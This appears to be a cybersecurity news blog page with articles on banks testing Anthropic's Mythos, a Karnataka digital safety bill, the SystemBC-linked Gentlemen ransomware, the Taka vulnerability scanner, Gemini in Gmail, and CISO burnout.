Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Latest News

Why Stolen Passwords Are Now the Biggest Cyber Threat

  Organizations today often take confidence in hardened perimeters, well-configured firewalls, and constant monitoring for software vulnerab...

All the recent news you need to know

Wall Street Banks Test Anthropic Mythos AI as Regulators Warn of Rising Cybersecurity Threats

 

Now showing up in high-security finance circles: early tests of cutting-edge AI aimed at boosting cyber resilience, driven by rising regulator unease over smart-tech dangers. Leading the charge - an emerging system called Mythos, developed by Anthropic, notable not just for spotting code flaws but also for actively probing them under controlled conditions. 

Hidden flaws in financial networks now draw attention through Mythos, offering banks an early look ahead of potential breaches. Rather than waiting, some begin using artificial intelligence to mimic live hacking attempts across vast operations. What was once passive observation shifts toward active testing - driven by machines that learn attacker behavior. Instead of just alarms after intrusion, systems predict paths criminals might follow. Tools evolve beyond fixed rules into adaptive models shaped by constant simulation. Security transforms quietly - not with fanfare - but through repeated digital trials beneath the surface. 

What's pushing these tests forward? Part of it comes from alerts issued by American regulatory bodies, highlighting rising risks tied to artificial intelligence in cyber threats. As AI systems grow sharper, officials warn they might empower attackers to run breaches automatically, uncover system weaknesses faster, then strike vital operations - banks included - with greater precision. Though subtle, the shift marks a turning point in how digital dangers evolve. 

One reason Mythos stands out is its ability to analyze enormous amounts of code quickly. Because it detects hidden bugs others miss, security teams gain deeper insight into weak spots. What makes the model unusual is how it links separate issues to map multi-step exploits. Although some worry such power could be misapplied, financial institutions find value in testing systems against lifelike threats. Most cyber specialists point out the banking world faces extra risk because everything links together, holding valuable information. 

A small flaw might spread widely, disrupting transactions, markets, sometimes personal records. Tools powered by artificial intelligence - Mythos, for example - might detect weaknesses sooner than traditional methods. Meanwhile, regulatory bodies urge stricter supervision along with more defined guidelines governing AI applications in finance. What worries them extends beyond outside dangers - to include internal weaknesses that might emerge if AI tools lack proper governance inside organizations. 

While safety is a priority, so too is preventing system failures caused by weak oversight structures. Restricting entry to Mythos, Anthropic allows just certain groups to test the system under tight conditions. While some push fast progress, others slow down - this move leans toward care over speed. Responsibility shapes how strong tools spread, not just what they can do. 

Though Wall Street banks assess artificial intelligence for cyber protection, one fact stands out - threats shift faster than ever. Those who blend AI into security efforts might stay ahead; however, success depends on steady monitoring, strong protective layers, and constant updates when new dangers appear.

Karnataka Unveils AI-Driven Bill to Enforce Swift Social Media Safety

 

Karnataka is set to revolutionize social media regulation with the draft Karnataka Responsible Social Media & Digital Safety Bill, 2026, submitted to Chief Minister Siddaramaiah. Prepared by the Karnataka State Policy and Planning Commission (KSPPC), this legislation emphasizes artificial intelligence (AI), rapid content moderation, and robust user protections, marking India's first state-level, AI-compliant, citizen-centric digital safety framework. S Mohanadass Hegde, a KSPPC member, highlighted its potential to foster responsible digital citizenship amid rising AI-driven threats. 

The primary focus is  on tackling AI-generated content and deepfakes through mandatory labelling, precise legal definitions, and strict penalties for misuse. Platforms face enforceable timelines, required to remove harmful content within 24 to 48 hours, shifting from advisory central guidelines to binding state actions. This departs from national laws like the Information Technology Act, 2000, and IT Rules, 2021, which prioritize due diligence without such tight deadlines.

The bill establishes the Karnataka Digital Safety & Social Media Regulatory Authority to monitor compliance and address region-specific digital risks swiftly. Users gain rights to report harmful content, access time-bound grievance redressal, and protections against harassment and misinformation. Hegde noted that localized oversight enables faster responses than central bodies, enhancing enforcement through tech tools like fake news detection, deepfake tracking, and real-time dashboards. 

Prevention takes center stage with a digital awareness and media literacy program promoting fact-checking, critical thinking, and responsible online behavior. This educational push targets mental well-being, particularly for youth vulnerable to harmful trends and addiction risks, balancing punishment with proactive measures. A team member emphasized education as key to curbing violations before they escalate. Implementation unfolds in phases: initial awareness and institutional setup, followed by technology integration and full enforcement. Slated for legal vetting and monsoon session introduction in June-July 2026, the draft positions Karnataka as a leader in decentralized digital governance, offering a blueprint for other states amid evolving AI challenges.

SystemBC Infrastructure Breach Sheds Light on The Gentlemen Ransomware Network


 

Parallel to this, operators appear to employ public channels to reinforce coercion, selectively disclosing victim information in order to increase pressure and speed up payment, demonstrating a hybrid strategy combining technical sophistication with calculated psychological advantage. 

Check Point recently conducted an analysis which further contextualizes the scale of the operation, revealing that telemetry from a SystemBC command-and-control node reveals that 1,570 compromised systems have been compromised. As a covert access facilitator, the malware’s architecture is designed to establish SOCKS5-based tunneling within infected environments while maintaining communication with its control infrastructure via RC4-encrypted channels, which enable the malware to establish secure communication with its control infrastructure. 

Aside from providing persistent remote access, this also allows for staged delivery of secondary payloads, which may be deployed either on the disk or directly in memory. This complicates traditional detection mechanisms. Since surfacing in July 2025, The Gentlemen have rapidly expanded their operational tempo, with hundreds of victims publicly listed on its leak infrastructure, emphasizing both the efficiency and effectiveness of its affiliate model as well as its double-extortion strategies. 

There is still no definitive indication of the initial intrusion vector, but observed attack patterns suggest the use of exposed services and credential compromise followed by a structured intrusion lifecycle that incorporates reconnaissance, propagation, and the deployment of tools, including frameworks such as Cobalt Strike and SystemBC. 

There is particular concern regarding the group's demonstration of the use of Group Policy Objects by the group to propagate malicious components across domains, which indicates a degree of post-exploitation control which allows attackers to scale their impact quickly and remain stealthy. In addition to providing important context for its role within this campaign, the broader technical background of SystemBC traces to at least 2019 when it was designed as a covert SOCKS5 tunneling and proxying malware family. 

In the past several years, its evolution into a payload delivery mechanism has made it particularly appealing to ransomware operators, who have exploited its ability to discreetly deploy and execute secondary tools within compromised environments. It has been observed that, despite partial disruption attempts by law enforcement in 2024, SystemBC's infrastructure has proven highly resilient, and previous threat intelligence indicates sustained activity at scale, including the compromise of large numbers of commercial virtual private servers used to relay malicious traffic. 

It is currently being discovered that the majority of victims associated with its deployment are located in enterprise-intensive regions such as the United States, the United Kingdom, Germany, Australia, and Romania, which confirms the assessment that infections are largely the result of human-operated intrusions rather than indiscriminate mass exploitation. It has been observed that the attack workflows reflect a high degree of operational control following compromise in the observed incidents. 

Researchers found that attackers operated using domain controllers with elevated administrative privileges to validate credentials, perform reconnaissance, and move laterally. A variety of tools associated with advanced intrusion sets was deployed to facilitate the extension of access across networked systems, often through remote procedure calls, including credential harvesting utilities such as Mimikatz and adversary simulation frameworks such as Cobalt Strike. 

As a result of preparing and propagating the ransomware payload internally, such as Group Policy Objects, the malware was executed almost simultaneously across domain-joined assets. In the encryption routine, unique ephemeral keys are generated per file through the use of elliptic curve key exchange, combined with high-speed symmetric encryption, and partial encryption strategies are applied to optimize execution time on larger datasets. 

In addition to encrypting files, this malware systematically disables databases, backup services, and virtualisation processes, including forcefully shutting down virtual machines in ESXi environments as well as deleting shadow copies of data and system logs to hinder recovery and forensic investigation. There is still some uncertainty as to the precise role of SystemBC within The Gentlemen's broader operational stack, particularly the question of whether it is centrally managed or affiliate-driven. 

The convergence of proxy malware, post-exploitation frameworks, and a significant botnet footprint suggests a maturing and modular threat model. Researchers conclude that this integration indicates that the transition toward structured and scaleable attack orchestration is being initiated, supported by shared infrastructure and tools. 

The defensive guidance also incorporates signature-based detection artifacts like YARA rules and detailed indicators of compromise in order to assist organizations in identifying and mitigating similar intrusion patterns before they escalate into a full-scale ransomware attack. SystemBC has a long history of providing covert SOCKS5 tunnelling and traffic proxying services as a malware family dating back to at least 2019 that provides important context for its role within this campaign.

Due to its evolution into a payload delivery mechanism, it proved to be particularly valuable to ransomware operators. These operators were able to discreetly introduce and execute secondary tooling within compromised systems. Although law enforcement attempted to partially disrupt SystemBC's infrastructure in 2024, the infrastructure that underpins it has demonstrated notable resilience, as prior threat intelligence indicates sustained activity, including compromises of large volumes of virtual private servers, which are often used to relay malicious traffic.

It is currently being discovered that the majority of victims associated with its deployment are located in enterprise-intensive regions such as the United States, the United Kingdom, Germany, Australia, and Romania, which confirms the assessment that infections are largely the result of human-operated intrusions rather than indiscriminate mass exploitation. It has been observed that the attack workflows reflect a high degree of operational control following compromise in the observed incidents. 

It is noted by investigators that threat actors appeared to use domain controllers with elevated administrative privileges to validate credentials, conduct reconnaissance, and control lateral movement. In order to extend access across networked systems, often by way of remote procedure calls, sophisticated tools used to perform credential harvesting such as Mimikatz and adversary simulation frameworks such as Cobalt Strike have been deployed, including credential harvesting utilities such as Mimikatz. 

It was possible to stage and propagate ransomware payloads internally and deploy them using native mechanisms such as Group Policy Objects, resulting in near-simultaneous execution across domain-joined assets. The encryption routine itself uses a hybrid cryptographic model combining elliptic curve key exchange with high-speed symmetric encryption, generating individual ephemeral keys for each file and applying partial encryption strategies to optimize execution time on larger datasets. 

It is believed that this integration indicates a move toward more structured and scalable attack orchestration supported by shared infrastructure and tools. The defensive guidance includes detailed indications of compromise as well as signature-based detection artifacts such as YARA rules, which provide organizations with the ability to identify and mitigate similar intrusion patterns before they develop into large-scale ransomware attacks.

DARWIS Taka: A Web Vulnerability Scanner with AI-Powered Validation


DARWIS Taka, a new web vulnerability scanner, is now available for free and runs via Docker. It pairs a rules-based scanning engine with an optional AI layer that reviews each finding before it reaches the report, aimed squarely at the false-positive problem that has dogged vulnerability scanning for years.

Built in Rust, Taka ships with 88 detection rules across 29 categories covering common web vulnerabilities, and produces JSON or self-contained HTML reports.  Setup instructions, the Docker configuration, and documentation are published on GitHub at github.com/CSPF-Founder/taka-docker.

Two modes of AI validation

Taka's AI layer runs in one of two modes. In passive (evidence-analysis) mode, the model reviews the data the scanner already collected and returns a verdict without sending any further traffic to the target. In active mode, the AI acts as a second-stage tester: it proposes a small number of targeted follow-up requests, such as paired true and false payloads for a suspected SQL injection, Taka executes them, and the responses are fed back to the AI for differential analysis. Active mode is more decisive on borderline findings but generates additional traffic.

In both modes, every result is tagged with a verdict (confirmed, likely false positive, or inconclusive), a confidence score, and the AI's written reasoning. The report surfaces those labels alongside a summary of how many findings fell into each bucket. Nothing is dropped silently, so reviewers see what the AI believed and why, and can focus triage on the findings marked confirmed.

The validation layer currently supports Anthropic and OpenAI. The project team has tested Taka extensively with Anthropic's Claude Sonnet, which gave the best balance of reasoning quality and speed in their evaluation, and recommends it for the strongest results. AI validation is optional; without a key, Taka runs as a standard scanner with its own false-positive controls.

Scoring by evidence, not by single matches

Most scanners trigger on the first matcher that fires, which is why a single stray string in a response can produce a flood of bogus alerts. Taka uses a weighted scoring system instead. Each matcher in a rule, whether a status code, a regex, a header check, or a timing comparison, carries an integer weight reflecting how strong a signal it is. The rule declares a detection threshold, and a finding is raised only when the combined weight of the matchers that fired meets or exceeds that threshold.

Built to run against real systems

A circuit breaker halts scanning against hosts showing signs of distress, per-host rate limiting caps concurrent requests, and a passive mode disables all attack payloads for environments where only non-intrusive checks are acceptable. Three scan depth levels (quick, standard, deep) trade coverage against runtime, while a two-phase execution model keeps time-based blind rules from interfering with the rest of the scan.

A web interface ships with the tool for launching scans, inspecting findings alongside the raw evidence, and revisiting results.

Only the optional AI validation requires a third-party API key, supplied by the user. Taka is aimed at security engineers, penetration testers, bug bounty hunters, DevSecOps teams, and developers who want a scanner that respects their triage time.

Full setup instructions are available at github.com/CSPF-Founder/taka-docker.

Google Expands Gemini in Gmail, Forcing Billions to Reconsider Privacy, Control, and AI Dependence

 




Google has introduced one of the most extensive updates to Gmail in its history, warning that the scale of change driven by artificial intelligence may feel overwhelming for users. While some discussions have focused on surface-level changes such as switching email addresses, the company has emphasized that the real transformation lies in how AI is now embedded into everyday tools used by nearly two billion people. This shift requires far more serious attention.

At the center of this evolution is Gemini, Google’s artificial intelligence system, which is being integrated more deeply into Gmail and other core services. In a recent update shared through a short video message, Gmail’s product leadership acknowledged that the rapid pace of AI innovation can leave users feeling overloaded, with too many new features and decisions emerging at once.

Gmail has traditionally been built around convenience, scale, and seamless integration rather than strict privacy-first principles. Although its spam filters and malware detection systems are widely used and generally effective, they are not flawless. Importantly, Gmail has not typically been the platform users turn to for strong privacy assurances.

The introduction of Gemini changes this bbalance substantially. Google has clarified that it does not use email content to train its AI models. However, the way these tools function introduces new concerns. Features that automatically draft emails, summarize conversations, or search inbox content require access to emails that may contain highly sensitive personal or professional information.

To address this, Google describes Gemini as a temporary assistant that operates within a limited session. The company compares this interaction to allowing a helper into a private room containing your inbox. The assistant completes its task and then exits, with the accessed information disappearing afterward. According to Google, Gemini does not retain or learn from the data it processes during these interactions.

Despite these assurances, concerns remain. Even if the data is not stored long term, granting a cloud-based AI system access to private communications introduces an inherent level of risk. Additionally, while Google has denied automatically enrolling users into AI training programs, many of these AI-powered features are expected to be enabled by default. This shifts responsibility to users, who must actively decide how much access they are willing to allow.

This is not a decision that can be ignored. Once AI tools become integrated into daily workflows, they are difficult to remove. Relying on default settings or delaying action could result in long-term dependence on systems that users may not fully understand or control.

Shortly after promoting these updates, Gmail experienced a disruption that affected its core functionality. Users reported delays in sending and receiving emails, and Google acknowledged the issue while working on a fix. Initially, no estimated resolution time was provided. Later the same day, the company confirmed that the issue had been resolved.

According to Google’s official status update, the disruption was fixed on April 8, 2026, at 14:49 PDT. The cause was identified as a “noisy neighbor,” a term used in cloud computing to describe a situation where one service consumes excessive shared resources, negatively impacting the performance of others operating on the same infrastructure.

With a user base of approximately two billion, even a short-lived outage becomes of grave concern. More importantly, it emphasises the scale at which Gmail operates and reinforces why decisions around AI integration are critical for users worldwide.

The central issue now facing users is the balance between convenience and security. Google presents Gemini as a helpful and well-behaved assistant that enhances productivity without overstepping boundaries. However, like any guest given access to a private space, it requires clear rules and careful oversight.

This tension becomes even more visible when considering Google’s parallel efforts to strengthen security. The company recently expanded client-side encryption for Gmail on mobile devices. While this may sound similar to end-to-end encryption used in messaging apps, it is not the same. This form of encryption operates at an organizational level, primarily for enterprise users, and does not provide the same device-specific privacy protections commonly associated with true end-to-end encryption.

More critically, enabling this additional layer of encryption dynamically limits Gmail’s functionality. When it is turned on, several features become unavailable. Users can no longer use confidential mode, access delegated accounts, apply advanced email layouts, or send bulk emails using multi-send options. Features such as suggested meeting times, pop-out or full-screen compose windows, and sending emails to group recipients are also disabled.

In addition, personalization and usability tools are affected. Email signatures, emojis, and printing functions stop working. AI-powered tools, including Google’s intelligent writing and assistance features, are also unavailable. Other smart Gmail features are disabled, and certain mobile capabilities, such as screen recording and taking screenshots on Android devices, are restricted.

These limitations exist because encrypted data cannot be accessed by AI systems. As a result, users are forced to choose between stronger data protection and access to advanced features. The same mechanisms that secure information also prevent AI tools from functioning effectively.

This reflects a bigger challenge across the technology industry. Privacy and security measures often limit the capabilities of AI systems, which depend on access to data to operate. In Gmail’s case, these two priorities do not align easily and, in many ways, directly conflict.

From a wider perspective, this also highlights a fundamental limitation of email itself. The technology was developed in an earlier era and was not designed to handle modern cybersecurity threats. Its underlying structure lacks the robust protections found in newer communication platforms.

As artificial intelligence becomes more deeply integrated into everyday tools, users are being asked to make more informed and deliberate decisions about how their data is used. While Google presents Gemini as a controlled and temporary assistant, the responsibility ultimately lies with users to determine their comfort level.

For highly sensitive communication, relying solely on email may no longer be the safest option. Exploring alternative platforms with stronger built-in security may be necessary. Ultimately, this moment represents a critical choice: whether the convenience offered by AI is worth the level of access it requires.

CISO Burnout Is Costing Businesses More Than Money

 

Businesses are increasingly feeling the financial and operational impact of CISO burnout, as overstretched security leaders make slower decisions, miss critical signals, and eventually leave their roles. The pressure of rising cyber threats, regulatory demands, and limited resources is turning the CISO position into a high‑turnover, high‑cost liability rather than a strategic asset. 

Why CISOs are burning out 

CISOs today face an “always‑on” workload, with AI‑driven attacks, expanding digital estates, and constant audits leaving little room for rest. Many report chronic stress, decision fatigue, and missed family events, while still working well beyond contracted hours to keep up. Boards often understand the pressure in theory, but fail to translate this into better staffing, budgets, or clearer priorities.

When a burned‑out CISO resigns or takes extended leave, firms pay not only recruitment and onboarding costs, but also the hidden price of lost productivity and disrupted projects. One expert estimates total CISO replacement costs can exceed 200% of salary when incident‑related losses, staff turnover, and delayed IT initiatives are factored in. Incidents that might have been caught earlier are more likely to slip through, raising breach‑related expenses and reputational damage. 

Impact on security and board confidence 

Burnout erodes cyber resilience by weakening threat detection, slowing crisis‑time decisions, and degrading communication of risk to the board. As CISOs disengage, security can become an afterthought, initiatives stall, and internal morale in security teams drops. This visibly undermines confidence at the top, making it harder to secure long‑term investment in modern security programs.

To break the cycle, companies must invest in prevention: realistic job design, adequate headcount, clear mandates, and mental‑health support. Some firms are shifting toward fractional or portfolio‑style CISOs, spreading responsibility and reducing single‑point pressure. Firms that treat CISO well‑being as a core part of risk management will likely see better retention, stronger security posture, and lower overall breach‑related costs.

Featured